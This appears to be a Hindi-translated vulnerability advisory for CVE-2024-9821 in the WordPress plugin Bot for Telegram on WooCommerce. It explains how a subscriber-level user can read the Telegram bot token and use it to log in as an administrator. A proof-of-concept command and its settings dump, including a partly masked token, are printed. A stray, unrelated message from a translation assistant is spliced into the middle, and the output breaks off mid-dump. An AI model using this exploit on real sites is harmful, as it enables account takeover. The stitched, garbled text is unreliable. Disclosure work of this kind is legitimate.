
Bot for Telegram on WooCommerce <= 1.2.4 - प्रमाणित (Subscriber+) Telegram Bot टोकन प्रकटीकरण से प्रमाणीकरण बायपास
Bot for Telegram on WooCommerce <= 1.2.4 - प्रमाणित (सब्सक्राइबर+) टेलीग्राम बॉट टोकन प्रकटीकरण से प्रमाणीकरण बाईपास
Bot for Telegram on WooCommerce वर्डप्रेस प्लगइन, 'stm_wpcfto_get_settings' AJAX एक्शन पर अनधिकृत जाँच की कमी के कारण, 1.2.4 तक के सभी संस्करणों में संवेदनशील जानकारी के प्रकटीकरण के प्रति संवेदनशील है। यह प्रमाणित हमलावरों को, सब्सक्राइबर-स्तरीय या उससे ऊपर की पहुँच वाले, टेलीग्राम बॉट टोकन देखने में सक्षम बनाता है, जो बॉट को नियंत्रित करने के लिए उपयोग किया जाने वाला एक गुप्त टोकन है। Login with Telegram सुविधा के कारण, यदि वे उपयोगकर्ता नाम जानते हैं, तो इस टोकन का उपयोग साइट पर किसी भी मौजूदा उपयोगकर्ता, जैसे कि व्यवस्थापक, के रूप में लॉग इन करने के लिए किया जा सकता है।``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821
* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* डाउनलोड लिंक: [bot-for-telegram-on-woocommerce संस्करण 1.2.4 डाउनलोड करें](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)
POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
The input provided is empty—there is no Markdown content in this chunk to translate. Please re-send the actual text for chunk 5 of 6.``` Vulnerability check: http://kubernetes.docker.internal Logged in successfully. { 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram ' 'Bot Token', 'type': 'text', 'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'}, 'bftow_bot_name': { 'description': 'Set ' 'if ' 'you ' 'want ' 'user ' 'to ' 'get ' 'back ' 'to ' 'Telegram ' 'after ' 'successful ' 'checkout. ' '(Without ' '"@")', 'label': 'Telegram ' 'Bot Name', 'type': 'text', 'value': 'Superbotman'}, 'bftow_buttons': { 'description': 'Save ' 'BOT ' 'Token ' 'first', 'label': 'Activate ' 'API URL', 'type': 'bftow_webhook_activation', 'value': ''}, 'bftow_google_maps_api_key': { 'description': '<a ' 'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide ' 'Google ' 'Maps ' 'API ' 'key ' 'with ' 'enabled ' 'geocoding ' 'API ' 'and ' 'configured ' 'billing ' 'account. ' 'If ' 'you ' 'leave ' 'this ' 'field ' 'empty, ' 'the ' 'location ' 'will ' 'be ' 'taken ' 'via ' 'openstreetmap', 'label': 'Google ' 'Maps ' 'API ' 'key', 'pro': True, 'type': 'text', 'value': ''}, 'bftow_proxy_server': { 'label': 'Proxy ' 'server', 'type': 'text', 'value': 'https://api.telegram.org/bot'}}, 'name': 'BOT API Settings'}, 'interface_settings': { 'fields': { 'bftow_cart_on_site': { 'description': 'if ' 'enabled ' 'and ' 'the '